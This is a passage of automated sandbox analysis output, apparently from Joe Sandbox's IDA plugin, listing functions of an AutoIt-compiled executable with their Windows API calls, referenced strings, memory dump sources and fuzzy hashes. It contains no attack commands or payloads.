@U=u, xrefs: 00B9A36F, 00B9A382, 00B9A3F4, 00B9A41E
tooltips_class32, xrefs: 00B9A346, 00B9A3D4

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$@U=u$tooltips_class32
API String ID: 1297703922-1130792468
Opcode ID: 2f011b550f645d8be24e1361ee5b0ac43e38a48d9c5dd4811c6f2edd231564a8
Instruction ID: 19cc2d1b84c5f7d54cef92d2cfb2fd7465d7f2afd236a75ea2519fec7221eeb2
Opcode Fuzzy Hash: 2f011b550f645d8be24e1361ee5b0ac43e38a48d9c5dd4811c6f2edd231564a8
Instruction Fuzzy Hash: DE719B71144205AFDB21CF28CC59FAA7BE9FB88300F04456DF985873A1DB71E942DB92

Function 00B9C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

DragQueryPoint.SHELL32(?,?), ref: 00B9C627

Part of subcall function 00B9AB37: ClientToScreen.USER32(?,?), ref: 00B9AB60
Part of subcall function 00B9AB37: GetWindowRect.USER32(?,?), ref: 00B9ABD6
Part of subcall function 00B9AB37: PtInRect.USER32(?,?,00B9C014), ref: 00B9ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00B9C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B9C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B9C6BE
_wcscat.LIBCMT ref: 00B9C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B9C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00B9C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00B9C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00B9C757
DragFinish.SHELL32(?), ref: 00B9C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B9C851

Strings

@GUI_DROPID, xrefs: 00B9C77E
@GUI_DRAGID, xrefs: 00B9C7C9
@U=u, xrefs: 00B9C690, 00B9C705, 00B9C71E, 00B9C735, 00B9C757
@GUI_DRAGFILE, xrefs: 00B9C800

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
API String ID: 169749273-762882726
Opcode ID: d9cdec323066e747ad727d1e9b92dafe8571ab81c6cd931134a1885e4dd177d9
Instruction ID: ecba23a0da837a0f3dbedc717427a7831d481314fa6a421913de7962c15e4a30
Opcode Fuzzy Hash: d9cdec323066e747ad727d1e9b92dafe8571ab81c6cd931134a1885e4dd177d9
Instruction Fuzzy Hash: DE615971108301AFCB01EF64DC85DAFBBE8EF89750F50096EF595932A1DB70AA49CB52

Function 00B6ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B6AC33

Strings

[LAST, xrefs: 00B6ACE0
[HANDLE:, xrefs: 00B6AC3F
[CLASS:, xrefs: 00B6AC83
[REGEXPTITLE:, xrefs: 00B6AC5B
HANDLE=, xrefs: 00B6AC2C
LAST, xrefs: 00B6ABF8
[ACTIVE, xrefs: 00B6AC20
ALL, xrefs: 00B6ACC7
CLASSNAME=, xrefs: 00B6AC70
ACTIVE, xrefs: 00B6AC0E
[ALL, xrefs: 00B6ACD9
REGEXP=, xrefs: 00B6AC48

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 3d171b03b894607bb0f8a859e613ab4b18547b3421e411f347fed24681050aad
Instruction ID: ba0582ac60087f6d1efdd8ce7c9ade1650aa89743b4860bbded132606d0d8d96
Opcode Fuzzy Hash: 3d171b03b894607bb0f8a859e613ab4b18547b3421e411f347fed24681050aad
Instruction Fuzzy Hash: 5E317C31A88209ABDB14EB60DE57FEE77E4EB10750FA004E9F402720E1EF656F448E52

Function 00B84FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00B85013
LoadCursorW.USER32(00000000,00007F00), ref: 00B8501E
LoadCursorW.USER32(00000000,00007F03), ref: 00B85029
LoadCursorW.USER32(00000000,00007F8B), ref: 00B85034
LoadCursorW.USER32(00000000,00007F01), ref: 00B8503F
LoadCursorW.USER32(00000000,00007F81), ref: 00B8504A
LoadCursorW.USER32(00000000,00007F88), ref: 00B85055
LoadCursorW.USER32(00000000,00007F80), ref: 00B85060
LoadCursorW.USER32(00000000,00007F86), ref: 00B8506B
LoadCursorW.USER32(00000000,00007F83), ref: 00B85076
LoadCursorW.USER32(00000000,00007F85), ref: 00B85081
LoadCursorW.USER32(00000000,00007F82), ref: 00B8508C
LoadCursorW.USER32(00000000,00007F84), ref: 00B85097
LoadCursorW.USER32(00000000,00007F04), ref: 00B850A2
LoadCursorW.USER32(00000000,00007F02), ref: 00B850AD
LoadCursorW.USER32(00000000,00007F89), ref: 00B850B8
GetCursorInfo.USER32(?), ref: 00B850C8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: ffcee9b2ab2c840da2605f7566b424ca4476ebb2ad31befd661b661e4eaf939e
Instruction ID: 54a2c4d31084f47b28374b0e3be84867291c4a9f28fba0839c7a1aa7dd29679c
Opcode Fuzzy Hash: ffcee9b2ab2c840da2605f7566b424ca4476ebb2ad31befd661b661e4eaf939e
Instruction Fuzzy Hash: 7B3105B1D4831E6ADF209FB68C899AFBFE8FF04750F50456AA50DE7280DA786540CF91

Function 00B94392 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B94424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B9446F

Strings

EXPAND, xrefs: 00B94521
COLLAPSE, xrefs: 00B944B5
GETSELECTED, xrefs: 00B9457F
CHECK, xrefs: 00B9448F
GETITEMCOUNT, xrefs: 00B94551
GETTEXT, xrefs: 00B945C2
EXISTS, xrefs: 00B944D8
ISCHECKED, xrefs: 00B945F2
@U=u, xrefs: 00B9446F
UNCHECK, xrefs: 00B9464B
SELECT, xrefs: 00B94620
GETTOTALCOUNT, xrefs: 00B94456

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-383632319
Opcode ID: 705eed86a6e64d34b0d84494480e28f5fdee147651d1f15b2059216622f54884
Instruction ID: 629d0dae4cab62413d18f068e6996c041bc7dec852d1cd0f72df0ed3c9a38dc1
Opcode Fuzzy Hash: 705eed86a6e64d34b0d84494480e28f5fdee147651d1f15b2059216622f54884
Instruction Fuzzy Hash: 0A916B712047019BCB04EF20C4A1AAEB7E5AF95350F5548ECF8965B3A2CB35ED4ACB81

Function 00B9B7FE Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B9B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B96B11,?), ref: 00B9B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B9B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B9B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B9B9C3
FreeLibrary.KERNEL32(?), ref: 00B9B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B9B9DF
DestroyIcon.USER32(?), ref: 00B9B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B9BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B9BA17

Part of subcall function 00B32EFD: __wcsicmp_l.LIBCMT ref: 00B32F86

Strings

.icl, xrefs: 00B9B82A
.exe, xrefs: 00B9B84A
@U=u, xrefs: 00B9B9F7
.dll, xrefs: 00B9B86D

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl$@U=u
API String ID: 1212759294-1639919054
Opcode ID: 76758cc968c45de14913494bbd0ddb2cdb5e389f66d9b67a4ba591da02cbcf5f
Instruction ID: f46cc31853e1db0cc9fbe90a97503b1052546cdd5d44ec6fa9a218848bb8c946
Opcode Fuzzy Hash: 76758cc968c45de14913494bbd0ddb2cdb5e389f66d9b67a4ba591da02cbcf5f
Instruction Fuzzy Hash: E361E171900219BAEF14DF64DD85FBE7BECEB08720F2041AAF915D61D1DB749A80D7A0

Function 00B7A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

CharLowerBuffW.USER32(?,?), ref: 00B7A3CB
GetDriveTypeW.KERNEL32 ref: 00B7A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B7A4C5

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

Strings

close cd wait, xrefs: 00B7A4B0
wait, xrefs: 00B7A482
set cd door , xrefs: 00B7A466
close, xrefs: 00B7A3D1
open, xrefs: 00B7A3F2
closed, xrefs: 00B7A3DF, 00B7A3E8
open , xrefs: 00B7A427
type cdaudio alias cd wait, xrefs: 00B7A443

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: fdfbdb7d34ca5c3cc6a4e76a06108ad0c018e7b22607d932ecd45cbd2d689fdc
Instruction ID: 454f67081d72673ff174f1eea5ee4c2af3f774e3e5f5a98ce55e3f1267c88228
Opcode Fuzzy Hash: fdfbdb7d34ca5c3cc6a4e76a06108ad0c018e7b22607d932ecd45cbd2d689fdc
Instruction Fuzzy Hash: F7513B711082059FC740EF10C891DAAB7F4EF94758F5088ADF89A972A1DB71EE4ACB52

Function 00B6F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00B4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00B6F8DF
LoadStringW.USER32(00000000,?,00B4E029,00000001), ref: 00B6F8E8

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

GetModuleHandleW.KERNEL32(00000000,00BD5310,?,00000FFF,?,?,00B4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00B6F90A
LoadStringW.USER32(00000000,?,00B4E029,00000001), ref: 00B6F90D
__swprintf.LIBCMT ref: 00B6F95D
__swprintf.LIBCMT ref: 00B6F96E
_wprintf.LIBCMT ref: 00B6FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B6FA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B6FA12
Error: , xrefs: 00B6F9E5
Line %d:, xrefs: 00B6F968
Line %d (File "%s"):, xrefs: 00B6F957
^ ERROR, xrefs: 00B6F9C3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 46e2a2cf74c61da0676242fc0f78390b349d1d32fe1b6ccd14cd518da25b5383
Instruction ID: 7910e068ed18677d649d06eea64e555a9cb7ae22fba5ff33f172339c4d9e2ec3
Opcode Fuzzy Hash: 46e2a2cf74c61da0676242fc0f78390b349d1d32fe1b6ccd14cd518da25b5383
Instruction Fuzzy Hash: 04412F7284411DAACB14FBE0DD96EFEB7B8EF54300F9004A5B505B70A1EE356F49CA61

Function 00B7D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00B7DA10
_wcscat.LIBCMT ref: 00B7DA28
_wcscat.LIBCMT ref: 00B7DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B7DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7DA63
GetFileAttributesW.KERNEL32(?), ref: 00B7DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B7DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00B7DAA7

Strings

*.*, xrefs: 00B7DAE6

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 448e637857b6ee608046aa6cf8d0cebb2cb10f895e16be9385d866a0ada64147
Instruction ID: 4eb961528f5798f59bc27f993c21e1646f13acaad56c7c483f57e80a6c5882a7
Opcode Fuzzy Hash: 448e637857b6ee608046aa6cf8d0cebb2cb10f895e16be9385d866a0ada64147
Instruction Fuzzy Hash: C48193716042419FCB24DF64C884AAAB7F4FF89390F1888AEF9ADD7251D730E945CB52

Function 00B9C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B9C1FC
GetFocus.USER32 ref: 00B9C20C
GetDlgCtrlID.USER32(00000000), ref: 00B9C217
_memset.LIBCMT ref: 00B9C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B9C36D
GetMenuItemCount.USER32(?), ref: 00B9C38D
GetMenuItemID.USER32(?,00000000), ref: 00B9C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B9C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B9C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B9C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B9C489

Strings

0, xrefs: 00B9C33A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: d7365e91228e98b0402b82120d8807333a6c922a011cfd99e7ed110c7b6918ae
Instruction ID: df13fe3de04379f981ac5aa14be2097dcedc83fce48d6c6cfd417fb4af11e2e6
Opcode Fuzzy Hash: d7365e91228e98b0402b82120d8807333a6c922a011cfd99e7ed110c7b6918ae
Instruction Fuzzy Hash: A5817B712083019FDB20DF24C994A7ABBE8FB88714F1049BEF99597391DB70D905CBA2

Function 00B8731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B8738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B8739B
CreateCompatibleDC.GDI32(?), ref: 00B873A7
SelectObject.GDI32(00000000,?), ref: 00B873B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B87408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B87444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B87468
SelectObject.GDI32(00000006,?), ref: 00B87470
DeleteObject.GDI32(?), ref: 00B87479
DeleteDC.GDI32(00000006), ref: 00B87480
ReleaseDC.USER32(00000000,?), ref: 00B8748B

Strings

(, xrefs: 00B87410

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 21cfaa7be148d90706050541bd23cf23fedc812a727c19cdecb515df76ed8dbf
Instruction ID: b7745985033ce05a8174a74d5ac546d7fa9fcdf6fe4dbcefee871127db9e5588
Opcode Fuzzy Hash: 21cfaa7be148d90706050541bd23cf23fedc812a727c19cdecb515df76ed8dbf
Instruction Fuzzy Hash: 99512875944309AFCB14DFA9CC85EAEBBF9EF48310F24846AE95997221CB31A941CB50

Function 00B74F75 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B74F7A

Part of subcall function 00B3049F: timeGetTime.WINMM(?,753DB400,00B20E7B), ref: 00B304A3

Sleep.KERNEL32(0000000A), ref: 00B74FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00B74FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B74FEC
SetActiveWindow.USER32 ref: 00B7500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B75019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B75038
Sleep.KERNEL32(000000FA), ref: 00B75043
IsWindow.USER32 ref: 00B7504F
EndDialog.USER32(00000000), ref: 00B75060

Strings

BUTTON, xrefs: 00B74FDE
@U=u, xrefs: 00B75019, 00B75038

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: @U=u$BUTTON
API String ID: 1194449130-2582809321
Opcode ID: d76b81e7637bde138d93dad0bfe69dfb9591afe69932bb2d1efdf1ba1ea45092
Instruction ID: fb81046dd0211f19514bf6ac543ce8c80acfe5d603bdf163fd99119aee977988
Opcode Fuzzy Hash: d76b81e7637bde138d93dad0bfe69dfb9591afe69932bb2d1efdf1ba1ea45092
Instruction Fuzzy Hash: 6D21D774205605AFE7205F30FDA8A3677E9EB14759F04506AF11AC31B4DF758D50C761

Function 00B16A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00B30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B16B0C,?,00008000), ref: 00B30973

Part of subcall function 00B14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B14743,?,?,00B137AE,?), ref: 00B14770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B16BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00B16CFA

Part of subcall function 00B1586D: _wcscpy.LIBCMT ref: 00B158A5

Part of subcall function 00B3363D: _iswctype.LIBCMT ref: 00B33645

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B4E496
Bad directive syntax error, xrefs: 00B4E79D
EA06, xrefs: 00B4E452
Error opening the file, xrefs: 00B4E43D, 00B4E4B8
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00B4E421
AU3!, xrefs: 00B16B61
Unterminated string, xrefs: 00B4E7E4

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: fcf16c7f8c957a4632913b2e3e1555daa81ac499ea3842735093ddc185de5561
Instruction ID: 9e048705520eff17dd80f3eb919640d027e00ab24f80e83156c23cb74bfa2fce
Opcode Fuzzy Hash: fcf16c7f8c957a4632913b2e3e1555daa81ac499ea3842735093ddc185de5561
Instruction Fuzzy Hash: 3F02BD311083419FC724EF24C881AAFBBE5FF99314F5049ADF499972A1DB30DA89DB52

Function 00B72D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

